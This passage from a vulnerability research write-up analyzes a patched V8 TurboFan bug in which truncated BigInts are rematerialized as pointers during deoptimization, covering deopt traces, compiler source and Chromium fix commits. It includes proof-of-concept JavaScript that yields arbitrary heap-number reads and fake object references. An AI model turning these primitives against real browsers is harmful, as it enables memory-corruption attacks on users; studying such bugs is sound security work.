0x1332e5442b4c 2c 740d jz 0x1332e5442b5b <+0x3b>
-- Inlined Trampoline to CompileLazyDeoptimizedCode --
0x1332e5442b4e 2e 49ba6096371501000000 REX.W movq r10,0x115379660 (CompileLazyDeoptimizedCode) ;; off heap target
0x1332e5442b58 38 41ffe2 jmp r10
Now let's trace the actual deoptimization with --trace-deopt
. We can see the deoptimization reason : wrong name. Because the feedback indicates that we always add a property named "x", TurboFan then speculates it will always be the case. Thus, executing optimized code with any different name will violate this assumption and trigger a deoptimization.
[deoptimizing (DEOPT eager): begin 0x0a6842edfa99 <JSFunction add_prop (sfi = 0xa6842edf881)> (opt #0) @2, FP to SP delta: 24, caller sp: 0x7ffeeb82e3b0]
;;; deoptimize at <test.js:3:8>, wrong name
It displays the input frame.
reading input frame add_prop => bytecode_offset=6, args=2, height=1, retval=0(#0); inputs:
0: 0x0a6842edfa99 ; [fp - 16] 0x0a6842edfa99 <JSFunction add_prop (sfi = 0xa6842edf881)>
1: 0x0a6876381579 ; [fp + 24] 0x0a6876381579 <JSGlobal Object>
2: 0x0a6842edf7a9 ; rdx 0x0a6842edf7a9 <String[#9]: different>
3: 0x0a6842ec1831 ; [fp - 24] 0x0a6842ec1831 <NativeContext[244]>
4: captured object #0 (length = 7)
0x0a68d4640439 ; (literal 3) 0x0a68d4640439 <Map(HOLEY_ELEMENTS)>
0x0a6893080c01 ; (literal 4) 0x0a6893080c01 <FixedArray[0]>
0x0a6893080c01 ; (literal 4) 0x0a6893080c01 <FixedArray[0]>
0x0a68930804b1 ; (literal 5) 0x0a68930804b1 <undefined>
0x0a68930804b1 ; (literal 5) 0x0a68930804b1 <undefined>
0x0a68930804b1 ; (literal 5) 0x0a68930804b1 <undefined>
0x0a68930804b1 ; (literal 5) 0x0a68930804b1 <undefined>
5: 0x002a00000000 ; (literal 6) 42
The deoptimizer uses the translation at index 2 of deoptimization data.
2 6 NA BEGIN {frame count=1, js frame count=1, update_feedback_count=0}
INTERPRETED_FRAME {bytecode_offset=6, function=0x3ee5e83df701 <String[#8]: add_prop>, height=1, retval=@0(#0)}
STACK_SLOT {input=3}
STACK_SLOT {input=-2}
REGISTER {input=rdx}
STACK_SLOT {input=4}
CAPTURED_OBJECT {length=7}
LITERAL {literal_id=3 (0x3ee5301c0439 <Map(HOLEY_ELEMENTS)>)}
LITERAL {literal_id=4 (0x3ee5f5180c01 <FixedArray[0]>)}
LITERAL {literal_id=4 (0x3ee5f5180c01 <FixedArray[0]>)}
LITERAL {literal_id=5 (0x3ee5f51804b1 <undefined>)}
LITERAL {literal_id=5 (0x3ee5f51804b1 <undefined>)}
LITERAL {literal_id=5 (0x3ee5f51804b1 <undefined>)}
LITERAL {literal_id=5 (0x3ee5f51804b1 <undefined>)}
LITERAL {literal_id=6 (42)}
And displays the translated interpreted frame.
translating interpreted frame add_prop => bytecode_offset=6, variable_frame_size=16, frame_size=80
0x7ffeeb82e3a8: [top + 72] <- 0x0a6876381579 <JSGlobal Object> ; stack parameter (input #1)
0x7ffeeb82e3a0: [top + 64] <- 0x0a6842edf7a9 <String[#9]: different> ; stack parameter (input #2)
-------------------------
0x7ffeeb82e398: [top + 56] <- 0x000105d9e4d2 ; caller's pc
0x7ffeeb82e390: [top + 48] <- 0x7ffeeb82e3f0 ; caller's fp
0x7ffeeb82e388: [top + 40] <- 0x0a6842ec1831 <NativeContext[244]> ; context (input #3)
0x7ffeeb82e380: [top + 32] <- 0x0a6842edfa99 <JSFunction add_prop (sfi = 0xa6842edf881)> ; function (input #0)
0x7ffeeb82e378: [top + 24] <- 0x0a6842edfbd1 <BytecodeArray[12]> ; bytecode array
0x7ffeeb82e370: [top + 16] <- 0x003b00000000 <Smi 59> ; bytecode offset
-------------------------
0x7ffeeb82e368: [top + 8] <- 0x0a6893080c11 <Odd Oddball: arguments_marker> ; stack parameter (input #4)
0x7ffeeb82e360: [top + 0] <- 0x002a00000000 <Smi 42> ; accumulator (input #5)
After that, it is ready to redirect the execution to the ignition interpreter.
[deoptimizing (eager): end 0x0a6842edfa99 <JSFunction add_prop (sfi = 0xa6842edf881)> @2 => node=6, pc=0x000105d9e9a0, caller sp=0x7ffeeb82e3b0, took 2.698 ms]
Materialization [0x7ffeeb82e368] <- 0x0a6842ee0031 ; 0x0a6842ee0031 <Object map = 0xa68d4640439>
Case study : an incorrect BigInt rematerialization
Back to simplified lowering
Let's have a look at the way FrameState
nodes are dealt with during the simplified lowering phase.
FrameState
nodes expect 6 inputs :
- parameters
UseInfo
isAnyTagged
- registers
UseInfo
isAnyTagged
- the accumulator
UseInfo
isAny
- a context
UseInfo
isAnyTagged
- a closure
UseInfo
isAnyTagged
- the outer frame state
UseInfo
isAnyTagged
A FrameState
has a tagged
output representation.
void VisitFrameState(Node* node) {
DCHECK_EQ(5, node->op()->ValueInputCount());
DCHECK_EQ(1, OperatorProperties::GetFrameStateInputCount(node->op()));
ProcessInput(node, 0, UseInfo::AnyTagged()); // Parameters.
ProcessInput(node, 1, UseInfo::AnyTagged()); // Registers.
// Accumulator is a special flower - we need to remember its type in
// a singleton typed-state-values node (as if it was a singleton
// state-values node).
if (propagate()) {
EnqueueInput(node, 2, UseInfo::Any());
} else if (lower()) {
Zone* zone = jsgraph_->zone();
Node* accumulator = node->InputAt(2);
if (accumulator == jsgraph_->OptimizedOutConstant()) {
node->ReplaceInput(2, jsgraph_->SingleDeadTypedStateValues());
} else {
ZoneVector<MachineType>* types =
new (zone->New(sizeof(ZoneVector<MachineType>)))
ZoneVector<MachineType>(1, zone);
(*types)[0] = DeoptMachineTypeOf(GetInfo(accumulator)->representation(),
TypeOf(accumulator));
node->ReplaceInput(
2, jsgraph_->graph()->NewNode(jsgraph_->common()->TypedStateValues(
types, SparseInputMask::Dense()),
accumulator));
}
}
ProcessInput(node, 3, UseInfo::AnyTagged()); // Context.
ProcessInput(node, 4, UseInfo::AnyTagged()); // Closure.
ProcessInput(node, 5, UseInfo::AnyTagged()); // Outer frame state.
return SetOutput(node, MachineRepresentation::kTagged);
}
An input node for which the use info is AnyTagged
means this input is being used as a tagged
value and that the truncation kind is any
i.e. no truncation is required (although it may be required to distinguish between zeros).
An input node for which the use info is Any
means the input is being used as any kind of value and that the truncation kind is any
. No truncation is needed. The input representation is undetermined. That is the most generic case.
// The {UseInfo} class is used to describe a use of an input of a node.
static UseInfo AnyTagged() {
return UseInfo(MachineRepresentation::kTagged, Truncation::Any());
}
// Undetermined representation.
static UseInfo Any() {
return UseInfo(MachineRepresentation::kNone, Truncation::Any());
}
// Value not used.
static UseInfo None() {
return UseInfo(MachineRepresentation::kNone, Truncation::None());
}
const char* Truncation::description() const {
switch (kind()) {
// ...
case TruncationKind::kAny:
switch (identify_zeros()) {
case TruncationKind::kNone:
return "no-value-use";
// ...
case kIdentifyZeros:
return "no-truncation (but identify zeros)";
case kDistinguishZeros:
return "no-truncation (but distinguish zeros)";
}
}
// ...
}
If we trace the first phase of simplified lowering (truncation propagation), we'll get the following input :
visit #46: FrameState (trunc: no-truncation (but distinguish zeros))
queue #7?: no-truncation (but distinguish zeros)
initial #45: no-truncation (but distinguish zeros)
queue #71?: no-truncation (but distinguish zeros)
queue #4?: no-truncation (but distinguish zeros)
queue #62?: no-truncation (but distinguish zeros)
queue #0?: no-truncation (but distinguish zeros)
All the inputs are added to the queue, no truncation is ever propagated. The node #71
corresponds to the accumulator since it is the 3rd input.
visit #71: BigIntAsUintN (trunc: no-truncation (but distinguish zeros))
queue #70?: no-value-use
In our example, the accumulator input is a BigIntAsUintN
node. Such a node consumes an input which is a word64
and is truncated to a word64
.
The astute reader will wonder what happens if this node returns a number that requires more than 64 bits. The answer lies in the inlining phase. Indeed, a JSCall to the BigInt.AsUintN builtin will be reduced to a BigIntAsUintN turbofan operator only in the case where TurboFan is guaranted that the requested width is of 64-bit a most.
This node outputs a word64
and has BigInt
as a restriction type. During the type propagation phase, any type computed for a given node will be intersected with its restriction type.
case IrOpcode::kBigIntAsUintN: {
ProcessInput(node, 0, UseInfo::TruncatingWord64());
SetOutput(node, MachineRepresentation::kWord64, Type::BigInt());
return;
}
So at this point (after the propagation phase and before the lowering phase), if we focus on the FrameState
node and its accumulator input node (3rd input), we can say the following :
- the FrameState's 2nd input expects MachineRepresentation::kNone (includes everything, especially kWord64)
- the FrameState doesn't truncate its 2nd input
- the BigIntAsUintN output representation is kWord64
Because the input 2 is used as Any
(with a kNone
representation), there won't ever be any conversion of the input node :
// Converts input {index} of {node} according to given UseInfo {use},
// assuming the type of the input is {input_type}. If {input_type} is null,
// it takes the input from the input node {TypeOf(node->InputAt(index))}.
void ConvertInput(Node* node, int index, UseInfo use,
Type input_type = Type::Invalid()) {
Node* input = node->InputAt(index);
// In the change phase, insert a change before the use if necessary.
if (use.representation() == MachineRepresentation::kNone)
return; // No input requirement on the use.
So what happens during during the last phase of simplified lowering (the phase that lowers nodes and adds conversions)?
If we look at the visitor of FrameState
nodes, we can see that eventually the accumulator input may get replaced by a TypedStateValues
node. The BigIntAsUintN
node is now the input of the TypedStateValues
node. No conversion of any kind is ever done.
ZoneVector<MachineType>* types =
new (zone->New(sizeof(ZoneVector<MachineType>)))
ZoneVector<MachineType>(1, zone);
(*types)[0] = DeoptMachineTypeOf(GetInfo(accumulator)->representation(),
TypeOf(accumulator));
node->ReplaceInput(
2, jsgraph_->graph()->NewNode(jsgraph_->common()->TypedStateValues(
types, SparseInputMask::Dense()),
accumulator));
Also, the vector of MachineType is associated to the TypedStateValues. To compute the machine type, DeoptMachineTypeOf
relies on the node's type.
In that case (a BigIntAsUintN node), the type will be Type::BigInt()
.
Type OperationTyper::BigIntAsUintN(Type type) {
DCHECK(type.Is(Type::BigInt()));
return Type::BigInt();
}
As we just saw, because for this node the output representation is kWord64 and the type is BigInt, the MachineType
is MachineType::AnyTagged
.
static MachineType DeoptMachineTypeOf(MachineRepresentation rep, Type type) {
// ..
if (rep == MachineRepresentation::kWord64) {
if (type.Is(Type::BigInt())) {
return MachineType::AnyTagged();
}
// ...
}
So if we look at the sea of node right after the escape analysis phase and before the simplified lowering phase, it looks like this :
And after the simplified lowering phase, we can confirm that a TypedStateValues
node was indeed inserted.
After effect control linearization, the BigIntAsUintN
node gets lowered to a Word64And
node.
As we learned earlier, the FrameState
and TypedStateValues
nodes do not directly correspond to any code generation.
void InstructionSelector::VisitNode(Node* node) {
switch (node->opcode()) {
// ...
case IrOpcode::kFrameState:
case IrOpcode::kStateValues:
case IrOpcode::kObjectState:
return;
// ...
However, other nodes may make use of FrameState
and TypedStateValues
nodes. This is the case for instance of the various Deoptimize
nodes and also Call
nodes.
They will make the instruction selector
build the necessary FrameStateDescriptor
and StateValueList
of StateValueDescriptor
.
Using those structures, the code generator
will then build the necessary DeoptimizationExit
s to which a Translation
will be associated with. The function BuildTranslation
will handle the the InstructionOperand
s in CodeGenerator::AddTranslationForOperand
. And this is where the (AnyTagged) MachineType
corresponding to the BigIntAsUintN
node is used! When building the translation, we are using the BigInt value as if it was a pointer (second branch) and not a double value (first branch)!
void CodeGenerator::AddTranslationForOperand(Translation* translation,
Instruction* instr,
InstructionOperand* op,
MachineType type) {
case Constant::kInt64:
DCHECK_EQ(8, kSystemPointerSize);
if (type.representation() == MachineRepresentation::kWord64) {
literal =
DeoptimizationLiteral(static_cast<double>(constant.ToInt64()));
} else {
// When pointers are 8 bytes, we can use int64 constants to represent
// Smis.
DCHECK_EQ(MachineRepresentation::kTagged, type.representation());
Smi smi(static_cast<Address>(constant.ToInt64()));
DCHECK(smi.IsSmi());
literal = DeoptimizationLiteral(smi.value());
}
break;
This is very interesting because that means at runtime (when deoptimizing), the deoptimizer uses this pointer to rematerialize an object! But since this is a controlled value (the truncated big int), we can make the deoptimizer reference an arbitrary object and thus make the next ignition bytecode handler use (or not) this crafted reference.
In this case, we are playing with the accumulator register. Therefore, to find interesting primitives, what we need to do is to look for all the bytecode handlers that get the accumulator (using a GetAccumulator
for instance).
Experiment 1 - reading an arbitrary heap number
The most obvious primitive is the one we get by deoptimizing to the ignition handler for add opcodes.
let addr = BigInt(0x11111111);
function setAddress(val) {
addr = BigInt(val);
}
function f(x) {
let y = BigInt.asUintN(49, addr);
let a = 111;
try {
var res = 1.1 + y; // will trigger a deoptimization. reason : "Insufficient type feedback for binary operation"
return res;
}
catch(_){ return y}
}
function compileOnce() {
f({x:1.1});
%PrepareFunctionForOptimization(f);
f({x:1.1});
%OptimizeFunctionOnNextCall(f);
return f({x:1.1});
}
When reading the implementation of the handler (BinaryOpAssembler::Generate_AddWithFeedback
in src/ic/bin-op-assembler.cc
), we observe that for heap numbers additions, the code ends up calling the function LoadHeapNumberValue
. In that case, it gets called with an arbitrary pointer.
To demonstrate the bug, we use the %DebugPrint
runtime function to get the address of an object (simulate an infoleak primitive) and see that we indeed (incorrectly) read its value.
d8> var a = new Number(3.14); %DebugPrint(a)
0x025f585caa49 <Number map = 000000FB210820A1 value = 0x019d1cb1f631 <HeapNumber 3.14>>
3.14
d8> setAddress(0x025f585caa49)
undefined
d8> compileOnce()
4.24
We can get the same primitive using other kind of ignition bytecode handlers such as +
, -
,/
,*
or %
.
--- var res = 1.1 + y;
+++ var res = y / 1;
d8> var a = new Number(3.14); %DebugPrint(a)
0x019ca5a8aa11 <Number map = 00000138F15420A1 value = 0x0168e8ddf611 <HeapNumber 3.14>>
3.14
d8> setAddress(0x019ca5a8aa11)
undefined
d8> compileOnce()
3.14
The --trace-ignition
debugging utility can be interesting in this scenario. For instance, let's say we use a BigInt value of 0x4200000000
and instead of doing 1.1 + y
we do y / 1
. Then we want to trace it and confirm the behaviour that we expect.
The trace tells us :
- a deoptimization was triggered and why (insufficient type feedback for binary operation, this binary operation being the division)
- in the input frame, there is a register entry containing the bigint value thanks to (or because of) the incorrect lowering
11: 0x004200000000 ; rcx 66
- in the translated interpreted frame the accumulator gets the value
0x004200000000 (<Smi 66>)
- we deoptimize directly to the offset 39 which corresponds to
DivSmi [1], [6]
[deoptimizing (DEOPT soft): begin 0x01b141c5f5f1 <JSFunction f (sfi = 000001B141C5F299)> (opt #0) @3, FP to SP delta: 40, caller sp: 0x0042f87fde08]
;;; deoptimize at <read_heap_number.js:11:17>, Insufficient type feedback for binary operation
reading input frame f => bytecode_offset=39, args=2, height=8, retval=0(#0); inputs:
0: 0x01b141c5f5f1 ; [fp - 16] 0x01b141c5f5f1 <JSFunction f (sfi = 000001B141C5F299)>
1: 0x03a35e2c1349 ; [fp + 24] 0x03a35e2c1349 <JSGlobal Object>
2: 0x03a35e2cb3b1 ; [fp + 16] 0x03a35e2cb3b1 <Object map = 0000019FAF409DF1>
3: 0x01b141c5f551 ; [fp - 24] 0x01b141c5f551 <ScriptContext[5]>
4: 0x03a35e2cb3d1 ; rdi 0x03a35e2cb3d1 <BigInt 283467841536>
5: 0x00422b840df1 ; (literal 2) 0x00422b840df1 <Odd Oddball: optimized_out>
6: 0x00422b840df1 ; (literal 2) 0x00422b840df1 <Odd Oddball: optimized_out>
7: 0x01b141c5f551 ; [fp - 24] 0x01b141c5f551 <ScriptContext[5]>
8: 0x00422b840df1 ; (literal 2) 0x00422b840df1 <Odd Oddball: optimized_out>
9: 0x00422b840df1 ; (literal 2) 0x00422b840df1 <Odd Oddball: optimized_out>
10: 0x00422b840df1 ; (literal 2) 0x00422b840df1 <Odd Oddball: optimized_out>
11: 0x004200000000 ; rcx 66
translating interpreted frame f => bytecode_offset=39, height=64
0x0042f87fde00: [top + 120] <- 0x03a35e2c1349 <JSGlobal Object> ; stack parameter (input #1)
0x0042f87fddf8: [top + 112] <- 0x03a35e2cb3b1 <Object map = 0000019FAF409DF1> ; stack parameter (input #2)
-------------------------
0x0042f87fddf0: [top + 104] <- 0x7ffd93f64c1d ; caller's pc
0x0042f87fdde8: [top + 96] <- 0x0042f87fde38 ; caller's fp
0x0042f87fdde0: [top + 88] <- 0x01b141c5f551 <ScriptContext[5]> ; context (input #3)
0x0042f87fddd8: [top + 80] <- 0x01b141c5f5f1 <JSFunction f (sfi = 000001B141C5F299)> ; function (input #0)
0x0042f87fddd0: [top + 72] <- 0x01b141c5fa41 <BytecodeArray[61]> ; bytecode array
0x0042f87fddc8: [top + 64] <- 0x005c00000000 <Smi 92> ; bytecode offset
-------------------------
0x0042f87fddc0: [top + 56] <- 0x03a35e2cb3d1 <BigInt 283467841536> ; stack parameter (input #4)
0x0042f87fddb8: [top + 48] <- 0x00422b840df1 <Odd Oddball: optimized_out> ; stack parameter (input #5)
0x0042f87fddb0: [top + 40] <- 0x00422b840df1 <Odd Oddball: optimized_out> ; stack parameter (input #6)
0x0042f87fdda8: [top + 32] <- 0x01b141c5f551 <ScriptContext[5]> ; stack parameter (input #7)
0x0042f87fdda0: [top + 24] <- 0x00422b840df1 <Odd Oddball: optimized_out> ; stack parameter (input #8)
0x0042f87fdd98: [top + 16] <- 0x00422b840df1 <Odd Oddball: optimized_out> ; stack parameter (input #9)
0x0042f87fdd90: [top + 8] <- 0x00422b840df1 <Odd Oddball: optimized_out> ; stack parameter (input #10)
0x0042f87fdd88: [top + 0] <- 0x004200000000 <Smi 66> ; accumulator (input #11)
[deoptimizing (soft): end 0x01b141c5f5f1 <JSFunction f (sfi = 000001B141C5F299)> @3 => node=39, pc=0x7ffd93f65100, caller sp=0x0042f87fde08, took 2.328 ms]
-> 000001B141C5FA9D @ 39 : 43 01 06 DivSmi [1], [6]
[ accumulator -> 66 ]
[ accumulator <- 66 ]
-> 000001B141C5FAA0 @ 42 : 26 f9 Star r2
[ accumulator -> 66 ]
[ r2 <- 66 ]
-> 000001B141C5FAA2 @ 44 : a9 Return
[ accumulator -> 66 ]
Experiment 2 - getting an arbitrary object reference
This bug also gives a better, more powerful, primitive. Indeed, if instead of deoptimizing back to an add handler, we deoptimize to Builtins_StaKeyedPropertyHandler
, we'll be able to store an arbitrary object reference in an object property. Therefore, if an attacker is also able to leverage an infoleak primitive, he would be able to craft any arbitrary object (these are sometimes referred to as addressof
and fakeobj
primitives) .
In order to deoptimize to this specific handler, aka deoptimize on obj[x] = y
, we have to make this line do something that violates a speculation. If we repeatedly call the function f
with the same property name, TurboFan will speculate that we're always gonna add the same property. Once the code is optimized, using a property with a different name will violate this assumption, call the deoptimizer and then redirect execution to the StaKeyedProperty
handler.
let addr = BigInt(0x11111111);
function setAddress(val) {
addr = BigInt(val);
}
function f(x) {
let y = BigInt.asUintN(49, addr);
let a = 111;
try {
var obj = {};
obj[x] = y;
return obj;
}
catch(_){ return y}
}
function compileOnce() {
f("foo");
%PrepareFunctionForOptimization(f);
f("foo");
f("foo");
f("foo");
f("foo");
%OptimizeFunctionOnNextCall(f);
f("foo");
return f("boom"); // deopt reason : wrong name
}
To experiment, we simply simulate the infoleak primitive by simply using a runtime function %DebugPrint
and adding an ArrayBuffer to the object. That should not be possible since the javascript code is actually adding a truncated BigInt.
d8> var a = new ArrayBuffer(8); %DebugPrint(a);
0x003d5ef8ab79 <ArrayBuffer map = 00000354B09C2191>
[object ArrayBuffer]
d8> setAddress(0x003d5ef8ab79)
undefined
d8> var badobj = compileOnce()
undefined
d8> %DebugPrint(badobj)
0x003d5ef8d159 <Object map = 00000354B09C9F81>
{boom: [object ArrayBuffer]}
d8> badobj.boom
[object ArrayBuffer]
Et voila! Sweet as!
Variants
We saw with the first commit that the pattern affected FrameState
nodes but also StateValues
nodes.
Another commit further fixed the exact same bug affecting ObjectState
nodes.
From 3ce6be027562ff6641977d7c9caa530c74a279ac Mon Sep 17 00:00:00 2001
From: Nico Hartmann <nicohartmann@chromium.org>
Date: Tue, 26 Nov 2019 13:17:45 +0100
Subject: [PATCH] [turbofan] Fixes crash caused by truncated bigint
Bug: chromium:1028191
Change-Id: Idfcd678b3826fb6238d10f1e4195b02be35c3010
Reviewed-on: https://chromium-review.googlesource.com/c/v8/v8/+/1936468
Commit-Queue: Nico Hartmann <nicohartmann@chromium.org>
Reviewed-by: Georg Neis <neis@chromium.org>
Cr-Commit-Position: refs/heads/master@{#65173}
---
diff --git a/src/compiler/simplified-lowering.cc b/src/compiler/simplified-lowering.cc
index 4c000af..f271469 100644
--- a/src/compiler/simplified-lowering.cc
+++ b/src/compiler/simplified-lowering.cc
@@ -1254,7 +1254,13 @@
void VisitObjectState(Node* node) {
if (propagate()) {
for (int i = 0; i < node->InputCount(); i++) {
- EnqueueInput(node, i, UseInfo::Any());
+ // TODO(nicohartmann): Remove, once the deoptimizer can rematerialize
+ // truncated BigInts.
+ if (TypeOf(node->InputAt(i)).Is(Type::BigInt())) {
+ EnqueueInput(node, i, UseInfo::AnyTagged());
+ } else {
+ EnqueueInput(node, i, UseInfo::Any());
+ }
}
} else if (lower()) {
Zone* zone = jsgraph_->zone();
@@ -1265,6 +1271,11 @@
Node* input = node->InputAt(i);
(*types)[i] =
DeoptMachineTypeOf(GetInfo(input)->representation(), TypeOf(input));
+ // TODO(nicohartmann): Remove, once the deoptimizer can rematerialize
+ // truncated BigInts.
+ if (TypeOf(node->InputAt(i)).Is(Type::BigInt())) {
+ ConvertInput(node, i, UseInfo::AnyTagged());
+ }
}
NodeProperties::ChangeOp(node, jsgraph_->common()->TypedObjectState(
ObjectIdOf(node->op()), types));
diff --git a/test/mjsunit/regress/regress-1028191.js b/test/mjsunit/regress/regress-1028191.js
new file mode 100644
index 0000000..543028a
--- /dev/null
+++ b/test/mjsunit/regress/regress-1028191.js
@@ -0,0 +1,23 @@
+// Copyright 2019 the V8 project authors. All rights reserved.
+// Use of this source code is governed by a BSD-style license that can be
+// found in the LICENSE file.
+
+// Flags: --allow-natives-syntax
+
+"use strict";
+
+function f(a, b, c) {
+ let x = BigInt.asUintN(64, a + b);
+ try {
+ x + c;
+ } catch(_) {
+ eval();
+ }
+ return x;
+}
+
+%PrepareFunctionForOptimization(f);
+assertEquals(f(3n, 5n), 8n);
+assertEquals(f(8n, 12n), 20n);
+%OptimizeFunctionOnNextCall(f);
+assertEquals(f(2n, 3n), 5n);
Interestingly, other bugs in the representation changers got triggered by very similars PoCs. The fix simply adds a call to InsertConversion
so as to insert a ChangeUint64ToBigInt
node when necessary.
From 8aa588976a1c4e593f0074332f5b1f7020656350 Mon Sep 17 00:00:00 2001
From: Nico Hartmann <nicohartmann@chromium.org>
Date: Thu, 12 Dec 2019 10:06:19 +0100
Subject: [PATCH] [turbofan] Fixes rematerialization of truncated BigInts
Bug: chromium:1029530
Change-Id: I12aa4c238387f6a47bf149fd1a136ea83c385f4b
Reviewed-on: https://chromium-review.googlesource.com/c/v8/v8/+/1962278
Auto-Submit: Nico Hartmann <nicohartmann@chromium.org>
Commit-Queue: Georg Neis <neis@chromium.org>
Reviewed-by: Georg Neis <neis@chromium.org>
Cr-Commit-Position: refs/heads/master@{#65434}
---
diff --git a/src/compiler/representation-change.cc b/src/compiler/representation-change.cc
index 99b3d64..9478e15 100644
--- a/src/compiler/representation-change.cc
+++ b/src/compiler/representation-change.cc
@@ -175,6 +175,15 @@
}
}
+ // Rematerialize any truncated BigInt if user is not expecting a BigInt.
+ if (output_type.Is(Type::BigInt()) &&
+ output_rep == MachineRepresentation::kWord64 &&
+ use_info.type_check() != TypeCheckKind::kBigInt) {
+ node =
+ InsertConversion(node, simplified()->ChangeUint64ToBigInt(), use_node);
+ output_rep = MachineRepresentation::kTaggedPointer;
+ }
+
switch (use_info.representation()) {
case MachineRepresentation::kTaggedSigned:
DCHECK(use_info.type_check() == TypeCheckKind::kNone ||
diff --git a/test/mjsunit/regress/regress-1029530.js b/test/mjsunit/regress/regress-1029530.js
new file mode 100644
index 0000000..918a9ec
--- /dev/null
+++ b/test/mjsunit/regress/regress-1029530.js
@@ -0,0 +1,40 @@
+// Copyright 2019 the V8 project authors. All rights reserved.
+// Use of this source code is governed by a BSD-style license that can be
+// found in the LICENSE file.
+
+// Flags: --allow-natives-syntax --interrupt-budget=1024
+
+{
+ function f() {
+ const b = BigInt.asUintN(4,3n);
+ let i = 0;
+ while(i < 1) {
+ i + 1;
+ i = b;
+ }
+ }
+
+ %PrepareFunctionForOptimization(f);
+ f();
+ f();
+ %OptimizeFunctionOnNextCall(f);
+ f();
+}
+
+
+{
+ function f() {
+ const b = BigInt.asUintN(4,10n);
+ let i = 0.1;
+ while(i < 1.8) {
+ i + 1;
+ i = b;
+ }
+ }
+
+ %PrepareFunctionForOptimization(f);
+ f();
+ f();
+ %OptimizeFunctionOnNextCall(f);
+ f();
+}
An inlining bug was also patched. Indeed, a call to BigInt.asUintN
would get inlined even when no value argument is given (as in BigInt.asUintN(bits,no_value_argument_here)
). Therefore a call to GetValueInput
would be made on a non-existing input! The fix simply adds a check on the number of inputs.
Node* value = NodeProperties::GetValueInput(node, 3); // input 3 may not exist!
An interesting fact to point out is that none of those PoCs would actually correctly execute. They would trigger exceptions that need to get caught. This leads to interesting behaviours from TurboFan that optimizes 'invalid' code.
Digression on pointer compression
In our small experiments, we used standard tagged pointers. To distinguish small integers (Smis) from heap objects, V8 uses the lowest bit of an object address.
Up until V8 8.0, it looks like this :
Smi: [32 bits] [31 bits (unused)] | 0
Strong HeapObject: [pointer] | 01
Weak HeapObject: [pointer] | 11
However, with V8 8.0 comes pointer compression. It is going to be shipped with the upcoming M80 stable release. Starting from this version, Smis and compressed pointers are stored as 32-bit values :
Smi: [31 bits] | 0
Strong HeapObject: [30 bits] | 01
Weak HeapObject: [30 bits] | 11
As described in the design document, a compressed pointer corresponds to the first 32-bits of a pointer to which we add a base address when decompressing.
Let's quickly have a look by inspecting the memory ourselves. Note that DebugPrint displays uncompressed pointers.
d8> var a = new Array(1,2,3,4)
undefined
d8> %DebugPrint(a)
DebugPrint: 0x16a4080c5f61: [JSArray]
- map: 0x16a4082817e9 <Map(PACKED_SMI_ELEMENTS)> [FastProperties]
- prototype: 0x16a408248f25 <JSArray[0]>
- elements: 0x16a4080c5f71 <FixedArray[4]> [PACKED_SMI_ELEMENTS]
- length: 4
- properties: 0x16a4080406e1 <FixedArray[0]> {
#length: 0x16a4081c015d <AccessorInfo> (const accessor descriptor)
}
- elements: 0x16a4080c5f71 <FixedArray[4]> {
0: 1
1: 2
2: 3
3: 4
}
If we look in memory, we'll actually find compressed pointers, which are 32-bit values.
(lldb) x/10wx 0x16a4080c5f61-1
0x16a4080c5f60: 0x082817e9 0x080406e1 0x080c5f71 0x00000008
0x16a4080c5f70: 0x080404a9 0x00000008 0x00000002 0x00000004
0x16a4080c5f80: 0x00000006 0x00000008
To get the full address, we need to know the base.
(lldb) register read r13
r13 = 0x000016a400000000
And we can manually uncompress a pointer by doing base+compressed_pointer
(and obviously we substract 1 to untag the pointer).
(lldb) x/10wx $r13+0x080c5f71-1
0x16a4080c5f70: 0x080404a9 0x00000008 0x00000002 0x00000004
0x16a4080c5f80: 0x00000006 0x00000008 0x08040549 0x39dc599e
0x16a4080c5f90: 0x00000adc 0x7566280a
Because now on a 64-bit build Smis are on 32-bits with the lsb set to 0, we need to shift their values by one.
Also, raw pointers are supported. An example of raw pointer is the backing store pointer of an array buffer.
d8> var a = new ArrayBuffer(0x40);
d8> var v = new Uint32Array(a);
d8> v[0] = 0x41414141
d8> %DebugPrint(a)
DebugPrint: 0x16a4080c7899: [JSArrayBuffer]
- map: 0x16a408281181 <Map(HOLEY_ELEMENTS)> [FastProperties]
- prototype: 0x16a4082476f5 <Object map = 0x16a4082811a9>
- elements: 0x16a4080406e1 <FixedArray[0]> [HOLEY_ELEMENTS]
- embedder fields: 2
- backing_store: 0x107314fd0
- byte_length: 64
- detachable
- properties: 0x16a4080406e1 <FixedArray[0]> {}
- embedder fields = {
0, aligned pointer: 0x0
0, aligned pointer: 0x0
}
(lldb) x/10wx 0x16a4080c7899-1
0x16a4080c7898: 0x08281181 0x080406e1 0x080406e1 0x00000040
0x16a4080c78a8: 0x00000000 0x07314fd0 0x00000001 0x00000002
0x16a4080c78b8: 0x00000000 0x00000000
We indeed find the full raw pointer in memory (raw | 00
).
(lldb) x/2wx 0x0000000107314fd0
0x107314fd0: 0x41414141 0x00000000
Conclusion
We went through various components of V8 in this article such as Ignition, TurboFan's simplified lowering phase as well as how deoptimization works. Understanding this is interesting because it allows us to grasp the actual underlying root cause of the bug we studied. At first, the base trigger looks very simple but it actually involves quite a few interesting mechanisms.
However, even though this bug gives a very interesting primitive, unfortunately it does not provide any good infoleak primitive. Therefore, it would need to be combined with another bug (obviously, we don't want to use any kind of heap spraying).
Special thanks to my mates Axel Souchet, Dougall J, Bill K, yrp604 and Mark Dowd for reviewing this article and kudos to the V8 team for building such an amazing JavaScript engine!
Please feel free to contact me on twitter if you've got any feedback or question!
Also, my team at Trenchant aka Azimuth Security
is hiring so don't hesitate to reach out if you're interested :) (DMs are open, otherwise jf at company dot com
with company
being azimuthsecurity
)
References
Technical documents
- V8's documentation
- Benedikt Meurer's publications
- Michael Stanton's blog
- Deoptimization in V8
- An introduction to TurboFan
- Attacking TurboFan - TyphoonCon 2019 talk